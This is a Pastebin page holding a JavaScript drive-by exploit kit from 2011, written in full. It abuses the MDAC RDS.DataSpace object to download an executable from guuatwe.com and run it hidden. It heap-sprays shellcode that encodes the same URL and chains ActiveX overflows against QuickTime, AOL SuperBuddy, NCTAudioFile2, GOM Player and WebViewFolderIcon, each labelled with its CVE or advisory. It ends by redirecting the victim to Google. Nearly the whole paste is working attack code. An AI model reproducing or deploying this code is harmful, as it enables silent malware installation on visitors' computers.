API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 16th, 2011
268
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 9.17 KB | None | 0 0
raw download clone embed print report
  1. function getRandomString(len)
  2. {
  3.     var chars = "abcdefghiklmnopqrstuvwxyz";
  4.     var string_length = len;
  5.     var randomstring = '';
  6.     for (var i = 0; i < string_length; i++) {
  7.         var rnum = Math.floor(Math.random() * chars.length);
  8.         randomstring += chars.substring(rnum, rnum + 1);
  9.     }
  10.     return randomstring;
  11. }
  12.  
  13. function CreateObj(CLSID, name) {
  14.     var r = null;
  15.     try {
  16.         eval('r = CLSID.CreateObject(name)')
  17.     } catch (e) {}
  18.     if (!r) {
  19.         try {
  20.             eval('r = CLSID.CreateObject(name, "")')
  21.         } catch (e) {}
  22.     }
  23.     if (!r) {
  24.         try {
  25.             eval('r = CLSID.CreateObject(name, "", "")')
  26.         } catch (e) {}
  27.     }
  28.     if (!r) {
  29.         try {
  30.             eval('r = CLSID.GetObject("", name)')
  31.         } catch (e) {}
  32.     }
  33.     if (!r) {
  34.         try {
  35.             eval('r = CLSID.GetObject(name, "")')
  36.         } catch (e) {}
  37.     }
  38.     if (!r) {
  39.         try {
  40.             eval('r = CLSID.GetObject(name)')
  41.         } catch (e) {}
  42.     }
  43.     return (r);
  44. }
  45. function PUQoa75u(xml, url) {
  46.     try {
  47.         xml.open("GET", url, false);
  48.         xml.send(null);
  49.     } catch (e) {
  50.         return 0;
  51.     }
  52.     return xml.responseBody;
  53. }
  54. function H5pqBlLZ(o, name, data) {
  55.     try {
  56.         o.Type = 1;
  57.         o.Mode = 3;
  58.         o.Open();
  59.         o.Write(data);
  60.         o.SaveToFile(name, 2);
  61.         o.Close();
  62.     } catch (e) {
  63.         return 0;
  64.     }
  65.     return 1;
  66. }
  67. function saveAndRun(url, msxml, adobd, shell, flg)
  68. {
  69.     var retval = 0;
  70.     var data = PUQoa75u(msxml, url);
  71.     if (data != 0) {
  72.         var name = "c:\\win" + getRandomString(4) + ".exe";
  73.         if (H5pqBlLZ(adobd, name, data) == 1) {
  74.             if (flg == 0) {
  75.                 try {
  76.                     shell.Run(name, 0);
  77.                     retval = 1;
  78.                 } catch (e) {}
  79.             } else {
  80.                 try {
  81.                     shell.ShellExecute(name, "", "", "open", 0);
  82.                     retval = 1;
  83.                 } catch (e) {}
  84.             }
  85.         }
  86.     }
  87.     return retval;
  88. }
  89. function n0lterOf()
  90. {
  91. //MDAC
  92. //MS06-014
  93.     var SjGuPMDY = new Array(null, null, null);
  94.     var f8SnLc6m = 0;
  95.     var FileURL = 'http://guuatwe.com/cgi-bin/in.cgi?02010258020000000019f696fa242c146581fe980f';
  96.     var GP_I_QqR = 1;
  97.     try {
  98.         var AwZtzjWT = 0;
  99.         var MTAHFY7C = document.createElement("object");
  100.         MTAHFY7C.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  101.         if (MTAHFY7C) {
  102.             SjGuPMDY[0] = CreateObj(MTAHFY7C, "msxml2.XMLHTTP");
  103.             if (!SjGuPMDY[0]) SjGuPMDY[0] = CreateObj(MTAHFY7C, "Microsoft.XMLHTTP");
  104.             if (!SjGuPMDY[0]) SjGuPMDY[0] = CreateObj(MTAHFY7C, "MSXML2.ServerXMLHTTP");
  105.             SjGuPMDY[1] = CreateObj(MTAHFY7C, "ADODB.Stream");
  106.             SjGuPMDY[2] = CreateObj(MTAHFY7C, "WScript.Shell");
  107.             if (!SjGuPMDY[2]) {
  108.                 SjGuPMDY[2] = CreateObj(MTAHFY7C, "Shell.Application");
  109.                 if (SjGuPMDY[2]) AwZtzjWT = 1;
  110.             }
  111.         }
  112.         if (SjGuPMDY[0] && SjGuPMDY[1] && SjGuPMDY[2]) {
  113.             for (var HanQIHas = 0; HanQIHas < GP_I_QqR; HanQIHas++) {
  114.                 var w3l9oW0c = saveAndRun(FileURL + '0' + HanQIHas.toString(), SjGuPMDY[0], SjGuPMDY[1], SjGuPMDY[2], AwZtzjWT);
  115.                 if (!f8SnLc6m)
  116.                 f8SnLc6m = w3l9oW0c;
  117.             }
  118.         }
  119.     } catch (e) {}
  120.     return f8SnLc6m;
  121. }
  122. var Cs7_PWfL = new Array();
  123. var a3mMODsG = 0;
  124. function BElrxd2U()
  125. {
  126.     Cs7_PWfL = Cs7_PWfL;
  127.     setTimeout("F0VTp03Y()", 2000); //WTF?
  128. }
  129. function MEaQ5wuE(V4VFVTqg, ZKviSpUh)
  130. {
  131.     while (V4VFVTqg.length * 2 < ZKviSpUh)
  132.     V4VFVTqg += V4VFVTqg;
  133.     V4VFVTqg = V4VFVTqg.substring(0, ZKviSpUh / 2);
  134.     return V4VFVTqg;
  135. }
  136. function DnCWiFOj()
  137. {
  138. //Shellcode
  139. //Use http://sandsprite.com/shellcode_2_exe.php
  140.     if (!a3mMODsG) {
  141.         var MbpsSXDL = 0x0c0c0c0c;
  142.         var shellcode = unescape("%uf633%u09e9%u0001%u5f00%uc033%u0364%u3040%u0c78" +
  143.         "%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u408b%u8d34" +
  144.         "%u7c40%u688b%u8b3c%u6af7%u5903%u9ce8%u0000%ue200" +
  145.         "%u68f9%u6e6f%u0000%u7568%u6c72%u546d%u16ff%ue88b" +
  146.         "%u86e8%u0000%u6800%u3233%u0000%u7568%u6573%u5472" +
  147.         "%u16ff%ue88b%u026a%ue859%u006f%u0000%uf9e2%uec83" +
  148.         "%u8b20%uc7dc%u6303%u5c3a%uc769%u0443%u666e%u2e6f" +
  149.         "%u43c7%u6508%u6578%u6a00%u6a00%u5300%u6a57%uff00" +
  150.         "%u0c56%udc8b%u016a%uff53%u0856%u1a6a%u406a%u56ff" +
  151.         "%u8b04%uebe8%u5f0c%u006a%u6a57%u5500%u006a%u56ff" +
  152.         "%ue814%uffef%uffff%u8b55%u83ec%u0c7d%u750f%ube16" +
  153.         "%u0001%u0000%u5aeb%u8b5f%u83f7%u05c6%u006a%u458b" +
  154.         "%u5008%u56ff%u3310%u5dc0%u10c2%u5100%u8b56%u3c75" +
  155.         "%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149" +
  156.         "%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d" +
  157.         "%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66" +
  158.         "%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359" +
  159.         "%ufe83%u7400%ue805%uff9c%uffff%ue8e8%ufffe%u8eff" +
  160.         "%u0e4e%uecec%u0397%u980c%u8afe%u360e%u2f1a%u8370" +
  161.         "%u5d4f%u60c9%uc308%u68bf%u7474%u3a70%u2f2f%u7567" +
  162.         "%u6175%u7774%u2e65%u6f63%u2f6d%u6763%u2d69%u6962" +
  163.         "%u2f6e%u6e69%u632e%u6967%u303f%u3032%u3031%u3532" +
  164.         "%u3038%u3038%u3030%u3030%u3030%u3130%u6639%u3936" +
  165.         "%u6636%u3261%u3234%u3163%u3634%u3835%u6631%u3965" +
  166.         "%u3038%u0066");
  167.         var base = 0x400000;
  168.         var K03nKeGs = shellcode.length * 2;
  169.         var ZKviSpUh = base - (K03nKeGs + 0x38);
  170.         var V4VFVTqg = unescape("%u0c0c%u0c0c");
  171.         V4VFVTqg = MEaQ5wuE(V4VFVTqg, ZKviSpUh);
  172.         var KGyijR1o = (MbpsSXDL - 0x400000) / base;
  173.         for (i = 0; i < KGyijR1o; i++) {
  174.             Cs7_PWfL[i] = V4VFVTqg + shellcode;
  175.         }
  176.         a3mMODsG = 1;
  177.         BElrxd2U();
  178.     }
  179.     return 0;
  180. }
  181. function setCookie(MsXJGK1z)
  182. {
  183.     try {
  184.         var HaD_xOyK = new Date();
  185.         HaD_xOyK.setDate(todayDate.getDate() + 1);
  186.         document.cookie =
  187.         "id=" + MsXJGK1z +
  188.         "; expires=" + HaD_xOyK.toGMTString() +
  189.         "; path=/";
  190.     } catch (e) {}
  191. }
  192. function SOhxTHtY() {
  193. //Apple QuickTime RTSP Response Header Content-Type Remote Stack Based Buffer Overflow Vulnerability
  194. //http://www.securityfocus.com/bid/26549/info
  195. //CVE-2007-6166
  196.     var U975d39H = 0;
  197.     var V9f7IKVO;
  198.     for (V9f7IKVO = 4; V9f7IKVO <= 8; V9f7IKVO++) {
  199.         try {
  200.             var dcYpQvmM = new ActiveXObject('QuickTime.QuickTime.' + V9f7IKVO);
  201.             if (dcYpQvmM) {
  202.                 if (V9f7IKVO == 4) U975d39H = '6';
  203.                 else U975d39H = '8';
  204.                 break;
  205.             }
  206.         } catch (e) {}
  207.     }
  208.     if (U975d39H) {
  209.         var Xxgrl_Ht = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0" style="border:0px">' +
  210.         '<param name="src" value="?o' + U975d39H +
  211.         '&p=2180945935&r=606868581">' +
  212.         '<param name="autoplay" value="true">' +
  213.         '<param name="loop" value="false">' +
  214.         '<param name="controller" value="true">' + '</object>';
  215.         setCookie(V9f7IKVO == 4 ? 6 : 16);
  216.         var IhlaMIiq = document.createElement("div");
  217.         IhlaMIiq.innerHTML = Xxgrl_Ht;
  218.         document.body.appendChild(IhlaMIiq);
  219.     }
  220.     return 0;
  221. }
  222. function u5r_Qafm() {
  223. //AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability
  224. //http://www.securityfocus.com/bid/23224/info
  225. //CVE-2006-5820
  226.     try {
  227.         var tXW7yj4H = new ActiveXObject('Sb.SuperBuddy.1');
  228.         if (tXW7yj4H) {
  229.             setCookie(9);
  230.             tXW7yj4H.LinkSBIcons(0x0c0c0c0c);
  231.         }
  232.     } catch (e) {}
  233.     return 0;
  234. }
  235. function Fv2QJVho()
  236. {
  237. //NCTsoft NCTAudioFile2 ActiveX Control Remote Buffer Overflow Vulnerability
  238. //http://www.securityfocus.com/bid/22196/info
  239. //CVE-2007-0018
  240.     try {
  241.         var zLlC1ZgM = document.createElement("object");
  242.         zLlC1ZgM.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");
  243.         var EJqO2XHr = '';
  244.         for (var i = 0; i < 4124; i++)
  245.         EJqO2XHr += "\x0c";
  246.         setCookie(3);
  247.         zLlC1ZgM.SetFormatLikeSample(EJqO2XHr);
  248.     } catch (e) {}
  249. }
  250. function uzbeukYW()
  251. {
  252. //http://www.securityfocus.com/bid/26236
  253. //Gretech GOM Player GomWeb3.DLL Remote Buffer Overflow Vulnerability
  254. //CVE-2007-5779
  255.     try {
  256.         var dj0JIo5m = new ActiveXObject("GomWebCtrl.GomManager.1");
  257.         if (dj0JIo5m) {
  258.             var scode = '';
  259.             var wzMF9BEs = 510;
  260.             for (var i = 0; i < wzMF9BEs; i++)
  261.             scode += unescape("%0c");
  262.             setCookie(13);
  263.             dj0JIo5m.OpenURL(scode);
  264.         }
  265.     } catch (e) {}
  266.     return 0;
  267. }
  268.  
  269. function bF4sn2HS()
  270. {
  271. //Internet Explorer WebViewFolderIcon setSlice() Overflow
  272. //http://www.exploit-db.com/exploits/2440/
  273. //http://www.securityfocus.com/bid/19030
  274.     setCookie(12);
  275.     for (var i = 0; i < 128; i++)
  276.     {
  277.         try {
  278.             var TNTSnXxZ = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
  279.             TNTSnXxZ.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c, 0x0c0c0c0c);
  280.         } catch (e) {}
  281.     }
  282.     return 0;
  283. }
  284. //Run sploits
  285. if (n0lterOf() || DnCWiFOj() || SOhxTHtY() || u5r_Qafm() || Fv2QJVho() || uzbeukYW() || bF4sn2HS()) {}
  286. setTimeout("window.location = 'http://www.google.com'", 5000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!